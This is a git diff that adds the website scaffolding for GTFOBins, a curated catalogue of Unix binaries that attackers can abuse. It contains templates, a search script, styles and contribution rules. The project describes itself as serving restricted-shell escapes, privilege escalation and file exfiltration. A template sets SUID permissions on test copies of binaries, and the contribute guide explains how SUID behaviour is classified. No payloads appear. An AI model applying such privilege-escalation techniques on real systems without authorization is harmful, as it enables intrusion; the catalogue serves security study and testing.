<input id="bin-search" type="text" placeholder="Filter by name, just start typing..."/>
|
||||
|
||||
<div id="bin-table-wrapper">
|
||||
<table id="bin-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Binary</th>
|
||||
<th>Functions</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
{% for file in site.gtfobins %}
|
||||
<tr>
|
||||
<td><a href="{{ file.url }}" class="bin-name">{% include get_bin_name path=file.path %}</a></td>
|
||||
<td>{% include function_list.html bin=file %}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</tbody>
|
||||
<tfoot>
|
||||
<tr><td id="search-message" colspan="2">No binary matches...</td></tr>
|
||||
</tfoot>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
var searchBox = document.querySelector('#bin-search');
|
||||
var searchMessage = document.querySelector('#search-message');
|
||||
searchMessage.style.display = 'none';
|
||||
|
||||
// ensure height during filtering
|
||||
var binTableWrapper = document.querySelector('#bin-table-wrapper');
|
||||
binTableWrapper.style.height = binTableWrapper.clientHeight + 'px';
|
||||
|
||||
searchBox.addEventListener('input', function () {
|
||||
var query = searchBox.value.toLowerCase().trim();
|
||||
var noResults = true;
|
||||
|
||||
document.querySelectorAll('#bin-table tbody tr').forEach(function (row) {
|
||||
var binName = row.firstElementChild.firstElementChild.innerText;
|
||||
if (binName.indexOf(query) !== -1) {
|
||||
row.style.display = '';
|
||||
noResults = false;
|
||||
} else {
|
||||
row.style.display = 'none';
|
||||
}
|
||||
});
|
||||
|
||||
searchMessage.style.display = noResults ? '' : 'none';
|
||||
});
|
||||
|
||||
addEventListener('keydown', function (event) {
|
||||
if (event.key.toLowerCase().match(/^[a-z]$/)) {
|
||||
searchBox.focus();
|
||||
}
|
||||
});
|
||||
|
||||
</script>
|
6
_includes/function_list.html
Normal file
6
_includes/function_list.html
Normal file
@ -0,0 +1,6 @@
|
||||
<ul class="function-list">
|
||||
{% for function in include.bin.functions %}
|
||||
{% assign type = function[0] %}
|
||||
<li><a href="{{ include.bin.url }}#{{ type }}">{{ site.data.functions[type].label }}</a></li>
|
||||
{% endfor %}
|
||||
</ul>
|
7
_includes/functions_description.html
Normal file
7
_includes/functions_description.html
Normal file
@ -0,0 +1,7 @@
|
||||
<dl>
|
||||
{% for function_pair in site.data.functions %}
|
||||
{% assign function = function_pair[1] %}
|
||||
<dt class="function-name">{{ function.label }}</dt>
|
||||
<dd>{{ function.description | markdownify }}</dd>
|
||||
{% endfor %}
|
||||
</dl>
|
1
_includes/get_bin_name
Normal file
1
_includes/get_bin_name
Normal file
@ -0,0 +1 @@
|
||||
{% assign fn_parts = include.path | split: '/' | last | split: '.' %}{% assign fn_parts_size = fn_parts | size %}{% if fn_parts_size < 3 %}{{- fn_parts[0] -}}{% else %}{{- fn_parts[0] -}}.{{- fn_parts[1] -}}{% endif %}
|
6
_includes/page_title.html
Normal file
6
_includes/page_title.html
Normal file
@ -0,0 +1,6 @@
|
||||
<h1>
|
||||
{% if page.url != '/' %}
|
||||
<a href="/">..</a> /
|
||||
{% endif %}
|
||||
{{ include.title }}
|
||||
</h1>
|
46
_layouts/bin.html
Normal file
46
_layouts/bin.html
Normal file
@ -0,0 +1,46 @@
|
||||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% capture bin_name %}{% include get_bin_name path=page.path %}{% endcapture %}
|
||||
|
||||
{% include page_title.html title=bin_name %}
|
||||
|
||||
{% include function_list.html bin=page %}
|
||||
|
||||
{{ page.description | markdownify }}
|
||||
|
||||
{% for function in page.functions %}
|
||||
|
||||
{% assign function_name = function[0] %}
|
||||
{% assign examples = function[1] %}
|
||||
|
||||
<h2 id="{{ function_name }}" class="function-name">
|
||||
{{- site.data.functions[function_name].label -}}
|
||||
</h2>
|
||||
|
||||
{{ site.data.functions[function_name].description | markdownify }}
|
||||
|
||||
{% for example in examples %}
|
||||
|
||||
<div class="example">
|
||||
{{ example.description | markdownify }}
|
||||
|
||||
{% capture code %}
|
||||
{%- if function_name == 'suid-enabled' or function_name == 'suid-limited' %}
|
||||
cp $(which {{ bin_name }}) .
|
||||
sudo chown 0 ./{{ bin_name }}
|
||||
sudo chmod +s ./{{ bin_name }}
|
||||
{% endif %}
|
||||
{{ example.code }}
|
||||
{% endcapture %}
|
||||
|
||||
<pre><code>
|
||||
{{- code | strip -}}
|
||||
</code></pre>
|
||||
|
||||
</div>
|
||||
|
||||
{% endfor %}
|
||||
|
||||
{% endfor %}
|
22
_layouts/common.html
Normal file
22
_layouts/common.html
Normal file
@ -0,0 +1,22 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>
|
||||
{{ site.title }}
|
||||
{% if page.url != '/' %}
|
||||
|
|
||||
{% if page.layout == 'bin' %}
|
||||
{{ page.title | downcase }}
|
||||
{% else %}
|
||||
{{ page.title }}
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
</title>
|
||||
<link rel="stylesheet" href="/style.css" type="text/css"/>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=yes">
|
||||
</head>
|
||||
<body>
|
||||
{{ content }}
|
||||
</body>
|
||||
</html>
|
7
_layouts/page.html
Normal file
7
_layouts/page.html
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
layout: common
|
||||
---
|
||||
|
||||
{% include page_title.html title=page.title %}
|
||||
|
||||
{{ content }}
|
45
contribute.md
Normal file
45
contribute.md
Normal file
@ -0,0 +1,45 @@
|
||||
---
|
||||
layout: page
|
||||
title: Contribute
|
||||
---
|
||||
|
||||
## Structure
|
||||
|
||||
Each GTFO binary is defined in a file in the `_gtfobins/` folder named as `<binary name>.md`, such file consists only of a [YAML] front matter which describes the binary and its functions.
|
||||
|
||||
[YAML]: http://yaml.org/
|
||||
|
||||
The full syntax is the following:
|
||||
|
||||
```
|
||||
description: Optional description of the binary
|
||||
functions:
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ....
|
||||
FUNCTION:
|
||||
- description: Optional description of the example
|
||||
code: Code of the example
|
||||
- ...
|
||||
...
|
||||
```
|
||||
|
||||
Where `FUNCTION` is one of the values described in the `_data/functions.yml` file.
|
||||
|
||||
Feel free to use any file in the `_gtfobins/` folder as an example.
|
||||
|
||||
Pull request process
|
||||
--------------------
|
||||
|
||||
Vendor software is accepted as well as standard Unix binaries. Binaries and techniques that only works on certain operating systems and versions are accepted and such limitations shall be noted in the `description` field.
|
||||
|
||||
Before sending a pull request of a new binary or function, ensure the following:
|
||||
|
||||
1. Verify the function works on at least one type of modern Unix system.
|
||||
2. Classifying SUID-related functions may be tricky because they depend on how the default shell behaves on different systems (i.e. Ubuntu vs. Debian) and how the external command is called (i.e. `exec()` family vs. `system()`). Check how the binary behaves:
|
||||
- The function is considered `suid-enabled` if runs external commands with SUID privileges on Ubuntu Linux.
|
||||
- The function is considered `suid-limited` if runs external commands with SUID privileges on Debian but it drops the privileges on Ubuntu Linux.
|
||||
3. Verify `sudo-enabled` function runs external commands under the `sudo` privileged context.
|
||||
|
||||
Pull requests adding new functions in `_data/functions.yml` are allowed and subjected to project maintainers vetting.
|
8
functions.md
Normal file
8
functions.md
Normal file
@ -0,0 +1,8 @@
|
||||
---
|
||||
layout: page
|
||||
title: Functions
|
||||
---
|
||||
|
||||
A binary may support one or more of the following functions:
|
||||
|
||||
{% include functions_description.html %}
|
16
index.md
Normal file
16
index.md
Normal file
@ -0,0 +1,16 @@
|
||||
---
|
||||
layout: page
|
||||
title: GTFOBins
|
||||
---
|
||||
|
||||
GTFOBins is a curated list of Unix binaries that can be leveraged by an attacker to bypass system security restrictions.
|
||||
|
||||
This was inspired by the [LOLBins and LOLScripts](https://github.com/api0cradle/LOLBAS) project for Windows environment.
|
||||
|
||||
The project collects legitimate Unix binaries that can be abused to <strike>get the f**k</strike> break out restricted shells, escalate or maintain elevated privileges, download or exfiltrate files, and facilitate the other post-exploitation tasks outlined [here](/functions/).
|
||||
|
||||
GTFOBins aims to be a shared project where everyone can contribute with additional binaries and techniques. You can find detailed instructions [here](/contribute/).
|
||||
|
||||
## List of GTFOBins
|
||||
|
||||
{% include bin_table.html %}
|
117
style.scss
Normal file
117
style.scss
Normal file
@ -0,0 +1,117 @@
|
||||
---
|
||||
---
|
||||
|
||||
$accent: #bf0707;
|
||||
$lighter: #fff4f4;
|
||||
$hover: #ff0000;
|
||||
|
||||
// layout
|
||||
|
||||
@media (min-width: 1000px) {
|
||||
body {
|
||||
width: 800px;
|
||||
margin: 0 auto;
|
||||
}
|
||||
}
|
||||
|
||||
// common tags
|
||||
|
||||
body {
|
||||
font-family: sans, sans-serif;
|
||||
}
|
||||
|
||||
code {
|
||||
padding: 0.15em 0.25em;
|
||||
border-radius: 0.25em;
|
||||
color: $accent;
|
||||
background: $lighter;
|
||||
}
|
||||
|
||||
pre {
|
||||
background: $lighter;
|
||||
padding: 1em;
|
||||
overflow-x: auto;
|
||||
|
||||
code {
|
||||
padding: 0;
|
||||
border-radius: 0;
|
||||
}
|
||||
}
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
color: $hover;
|
||||
}
|
||||
|
||||
// fragment targets
|
||||
|
||||
*:target {
|
||||
border-left: 5px solid $accent;
|
||||
padding-left: 5px;
|
||||
}
|
||||
|
||||
// binary list and search
|
||||
|
||||
#bin-search {
|
||||
padding: 0.5em;
|
||||
width: 100%;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
#bin-table {
|
||||
width: 100%;
|
||||
|
||||
th, td {
|
||||
padding: 0.2em 1em;
|
||||
}
|
||||
|
||||
th {
|
||||
text-align: left;
|
||||
}
|
||||
|
||||
#search-message {
|
||||
text-align: center;
|
||||
padding: 1em;
|
||||
}
|
||||
}
|
||||
|
||||
// function description
|
||||
|
||||
.function-list {
|
||||
font-size: 0.8rem;
|
||||
list-style: none;
|
||||
padding: 0;
|
||||
margin: 0;
|
||||
|
||||
li {
|
||||
display: inline-block;
|
||||
padding: 0.25em 0.5em;
|
||||
margin: 0.05em 0;
|
||||
border: 1px solid $accent;
|
||||
|
||||
a:link, a:visited {
|
||||
color: $accent;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
&:hover, a:hover {
|
||||
color: $hover;
|
||||
border-color: $hover;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// classes
|
||||
|
||||
.bin-name {
|
||||
font-family: monospace;
|
||||
font-size: 1.2rem;
|
||||
}
|
||||
|
||||
.function-name {
|
||||
font-size: 1.4rem;
|
||||
font-weight: bold;
|
||||
}
|
Loading…
Reference in New Issue
Block a user